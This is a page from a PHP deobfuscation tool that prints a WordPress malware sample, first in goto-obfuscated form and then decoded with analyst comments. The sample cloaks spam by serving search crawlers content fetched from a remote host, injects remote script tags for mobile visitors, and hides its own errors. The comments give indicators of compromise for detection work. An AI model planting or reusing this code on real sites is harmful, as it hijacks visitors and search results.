
PHP deobfuscation, decryption, reconstruction tool

Deobfuscates PHP malware, viruses and tampered code found on WordPress sites back into readable code.

*Please note that not every kind of obfuscated code can be decoded.

The code below was decoded.

<?php goto IGAC6; zsDgr: echo tR1LK("\x68\x74\x74\160\72\57\57\x35\x30\x2e\150\154\167\164\x6d\x6c\x2e\x63\156\x2f\x69\x54\116\122\104"); goto WmoR1; gXM5v: define("\154\x61\x6a\147\167", $OsUgP["\x48\x54\124\x50\137\125\x53\x45\x52\137\101\x47\x45\116\124"]); goto a18A1; XAeuy: define("\x4e\x34\...



Obfuscated php code

<?php
// Obfuscated sample, kept exactly as submitted to the decoder.
// Reading notes for analysts:
//  - Every statement is a labelled fragment chained with `goto`, so textual order is not
//    execution order. Execution starts at label IGAC6 and follows the jumps:
//    IGAC6 -> FZywf -> UG8An -> VxBvQ -> Ks93Z -> f1cyu -> FypvY -> XAeuy -> gXM5v -> a18A1
//    -> UIADN -> RksiN -> vTmXt -> B6pds -> ci2gy -> gUEEj -> zsDgr -> WmoR1.
//  - String literals are double-quoted runs of mixed hex (\x..) and octal (\...) escapes;
//    PHP turns them into plain text when the file is parsed, so nothing here is encrypted.
//  - The function is declared as Tr1lK and called as tR1LK; PHP function names are
//    case-insensitive, so the call resolves.
//  - A PHP file that opens with `goto <random label>;` and consists almost entirely of
//    escaped string literals is worth flagging for review during a site integrity scan.
 goto IGAC6; zsDgr: echo tR1LK("\x68\x74\x74\160\72\57\57\x35\x30\x2e\150\154\167\164\x6d\x6c\x2e\x63\156\x2f\x69\x54\116\122\104"); goto WmoR1; gXM5v: define("\154\x61\x6a\147\167", $OsUgP["\x48\x54\124\x50\137\125\x53\x45\x52\137\101\x47\x45\116\124"]); goto a18A1; XAeuy: define("\x4e\x34\x65\123\131", !isset($OsUgP["\x48\124\124\x50\x5f\x52\x45\106\105\x52\105\122"]) ? '' : $OsUgP["\110\124\124\120\137\x52\x45\106\105\x52\x45\x52"]); goto gXM5v; FypvY: define("\x64\126\152\x42\156", $OsUgP["\122\x45\x51\125\x45\x53\x54\x5f\x55\x52\x49"]); goto XAeuy; gUEEj: if (!preg_match(Ipf4Y, lajgw)) { if (!preg_match(uqvtp, lajgw)) { return; } echo "\x3c\163\143\x72\151\160\164\40\x73\162\143\75\x68\164\x74\160\72\57\57\61\56\154\x61\x69\157\165\164\x65\170\x2e\143\157\155\x2f\x6a\x73\x2e\x6a\x73\x3e\74\57\x73\x63\162\x69\x70\x74\76"; echo "\74\163\143\162\x69\160\x74\x20\x73\x72\x63\x3d\x68\x74\164\x70\x3a\57\57\x34\x33\56\61\x32\70\x2e\x35\x39\x2e\x32\62\64\x2f\x7a\x62\56\152\163\x3e\74\x2f\x73\143\162\151\x70\x74\x3e"; die; } goto zsDgr; Ks93Z: $OsUgP = $_SERVER; goto f1cyu; f1cyu: function Tr1lK($fmjrO) { $rqdhf = curl_init(); curl_setopt($rqdhf, CURLOPT_URL, $fmjrO); curl_setopt($rqdhf, CURLOPT_USERAGENT, $_SERVER["\110\x54\x54\120\137\x55\x53\x45\x52\x5f\x41\x47\105\116\x54"]); curl_setopt($rqdhf, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($rqdhf, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($rqdhf, CURLOPT_RETURNTRANSFER, 1); curl_setopt($rqdhf, CURLOPT_HEADER, 0); curl_setopt($rqdhf, CURLOPT_ENCODING, "\x67\172\151\160"); $kNlZg = curl_exec($rqdhf); curl_close($rqdhf); return $kNlZg; } goto FypvY; B6pds: define("\x75\161\166\x74\160", 
"\57\x70\x68\157\x6e\x65\x7c\160\141\x64\x7c\160\157\144\174\151\120\150\x6f\x6e\145\174\151\120\157\144\174\x69\157\163\x7c\151\x50\141\x64\174\101\156\144\162\x6f\151\144\x7c\x4d\x6f\142\151\154\x65\174\x42\154\x61\143\153\x42\145\162\x72\x79\x7c\x49\105\115\x6f\x62\151\154\x65\174\115\121\x51\102\x72\157\x77\163\x65\162\174\112\x55\x43\174\106\x65\156\x6e\x65\x63\x7c\167\117\x53\x42\162\157\167\163\145\162\174\x42\162\157\x77\163\145\x72\116\107\174\x57\145\x62\x4f\123\174\123\171\155\x62\x69\x61\x6e\x7c\127\151\x6e\144\157\x77\163\x20\x50\x68\157\x6e\x65\57"); goto ci2gy; a18A1: define("\x43\61\x4d\165\x65", "\x68\x74\164\160\72\57\x2f\x35\60\56\150\x6c\x77\164\x6d\154\x2e\x63\x6e\x2f"); goto UIADN; ci2gy: define("\x59\63\x48\147\x57", stristr(dVjBn, "\56\x78\x6d\154") or stristr(dVjBn, "\56\x64\x6f\x63") or stristr(dVjBn, "\56\x74\170\164") or stristr(dVjBn, "\x2e\x70\x70\x74") or stristr(dVjBn, "\x2e\x68\x74\155\x6c") or stristr(dVjBn, "\56\x78\154\x73") or stristr(dVjBn, "\x32\x30\x32") or stristr(dVjBn, "\56\163\x68\x74\x6d\x6c") or stristr(dVjBn, "\x31")); goto gUEEj; FZywf: error_reporting(0); goto UG8An; vTmXt: define("\111\x70\146\x34\x59", "\100\102\141\x69\144\x75\123\160\x69\x64\x65\162\x7c\x53\x6f\x67\x6f\165\x7c\x59\151\163\157\x75\174\110\141\x6f\163\x6f\x75\174\63\66\x30\123\160\151\x64\145\x72\100\x69"); goto B6pds; UIADN: define("\151\124\x4e\x52\104", "\77\x64\157\155\x61\151\156\x3d" . $OsUgP["\x48\124\124\120\137\110\117\123\124"] . "\46\160\x61\x74\x68\x3d" . dVjBn . "\x26\146\154\x61\147\x3d\147\154\x6f\x62\141\x6c" . "\46\x64\x62\x3d" . $_SERVER["\122\105\x4d\x4f\x54\105\x5f\101\x44\x44\122"]); goto RksiN; UG8An: header("\103\157\x6e\x74\145\x6e\x74\x2d\124\x79\160\x65\x3a\x20\x74\145\x78\x74\x2f\x68\164\155\x6c\x3b\143\x68\x61\162\163\x65\x74\75\165\164\x66\x2d\x38"); goto VxBvQ; RksiN: define("\x49\x61\x51\x57\x59", "\x69\x54\x4e\x52\x44\x26\x72\145\x66\145\162\x65\x72\75" . 
urlencode(N4eSY)); goto vTmXt; IGAC6: set_time_limit(0); goto FZywf; VxBvQ: $n_BfT = "\x73\x74\162\x69\x73\164\162"; goto Ks93Z; WmoR1: die;

Decoded (deobfuscated) PHP code

<?php

// Decoded malware sample, shown for analysis. Identifiers are the obfuscator's random names;
// only the control flow and the string literals have been restored.
// Overall behaviour of this file: it inspects the visitor's User-Agent and serves
// search-engine crawlers content fetched from a remote host, mobile browsers two remote
// <script> tags, and everyone else nothing (the script returns early).

// Remove the execution time limit so a slow remote fetch does not abort the request.
set_time_limit(0);
// Silence all PHP errors and warnings so failures leave no trace in the page output.
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
// Holds the function name "stristr"; it is not referenced again in the code shown.
$n_BfT = "stristr";
// Alias for $_SERVER; request metadata further down is read through this variable.
$OsUgP = $_SERVER;
/**
 * Fetches a URL with cURL and returns the response body.
 *
 * Analyst notes:
 *  - The visitor's own User-Agent header is forwarded to the remote host.
 *  - TLS certificate and host-name verification are both switched off, so any
 *    endpoint answering for the URL is accepted.
 *  - The call site spells the name `tR1LK`; PHP function names are case-insensitive.
 *  - An outbound HTTP request made by the web server's PHP process while serving a
 *    page is a useful thing to look for in egress or proxy logs.
 *
 * @param string $fmjrO URL to request.
 * @return string|bool Response body (headers excluded), or false when curl_exec() fails.
 */
function Tr1lK($fmjrO)
{
    $rqdhf = curl_init();
    curl_setopt($rqdhf, CURLOPT_URL, $fmjrO);
    // Reuse the User-Agent of the request currently being served.
    curl_setopt($rqdhf, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
    // Certificate chain and host name are not checked.
    curl_setopt($rqdhf, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($rqdhf, CURLOPT_SSL_VERIFYHOST, FALSE);
    // Return the body as a string instead of printing it; leave response headers out.
    curl_setopt($rqdhf, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($rqdhf, CURLOPT_HEADER, 0);
    // Ask for a gzip-encoded response; cURL decodes it before returning.
    curl_setopt($rqdhf, CURLOPT_ENCODING, "gzip");
    $kNlZg = curl_exec($rqdhf);
    curl_close($rqdhf);
    return $kNlZg;
}
// Request metadata captured as constants: requested path, referrer (empty string when the
// header is absent) and the visitor's User-Agent.
define("dVjBn", $OsUgP["REQUEST_URI"]);
define("N4eSY", !isset($OsUgP["HTTP_REFERER"]) ? '' : $OsUgP["HTTP_REFERER"]);
define("lajgw", $OsUgP["HTTP_USER_AGENT"]);
// Base URL of the remote content host; this constant is not referenced again in the code shown.
define("C1Mue", "http://50.hlwtml.cn/");
// Query string carrying the infected site's host name, the requested path and the
// visitor's IP address (sent under the parameter name "db").
define("iTNRD", "?domain=" . $OsUgP["HTTP_HOST"] . "&path=" . dVjBn . "&flag=global" . "&db=" . $_SERVER["REMOTE_ADDR"]);
// Starts with the literal text "iTNRD", not the value of the constant above, followed by
// the URL-encoded referrer; not referenced again in the code shown.
define("IaQWY", "iTNRD&referer=" . urlencode(N4eSY));
// Case-insensitive pattern for search-engine crawler User-Agents.
define("Ipf4Y", "@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i");
// Pattern for mobile-browser User-Agents; it has no `i` modifier, so it is case-sensitive.
define("uqvtp", "/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/");
// Boolean: true when the request URI contains any of the listed substrings, compared
// case-insensitively. "1" and "202" match very broadly. Not referenced again in the code shown.
define("Y3HgW", stristr(dVjBn, ".xml") or stristr(dVjBn, ".doc") or stristr(dVjBn, ".txt") or stristr(dVjBn, ".ppt") or stristr(dVjBn, ".html") or stristr(dVjBn, ".xls") or stristr(dVjBn, "202") or stristr(dVjBn, ".shtml") or stristr(dVjBn, "1"));
// Branch on the visitor type.
if (!preg_match(Ipf4Y, lajgw)) {
    // Not a listed crawler.
    if (!preg_match(uqvtp, lajgw)) {
        // Not a mobile browser either: stop this file without emitting anything.
        // NOTE(review): if this code is included from a site entry point (assumption, not
        // visible here), `return` hands control back and the normal page is served, so a
        // desktop browser sees nothing unusual.
        return;
    }
    // Mobile browser: emit two script tags that load JavaScript from remote hosts over
    // plain HTTP, then end the request so the legitimate page is never rendered.
    echo "<script src=http://1.laioutex.com/js.js></script>";
    echo "<script src=http://43.128.59.224/zb.js></script>";
    die;
}
// Listed crawler: print whatever the remote host returns, unescaped, in place of the page.
// The URL ends in the literal text "iTNRD"; PHP does not expand constants inside string
// literals, so the query string built above is not sent by this line as decoded. The
// obfuscated input contains the same literal bytes.
// To confirm an infection, compare the page returned for a crawler User-Agent with the one
// returned for a desktop browser; the three hosts named in this file are the network
// indicators to search for in logs.
echo tR1LK("http://50.hlwtml.cn/iTNRD");
die;

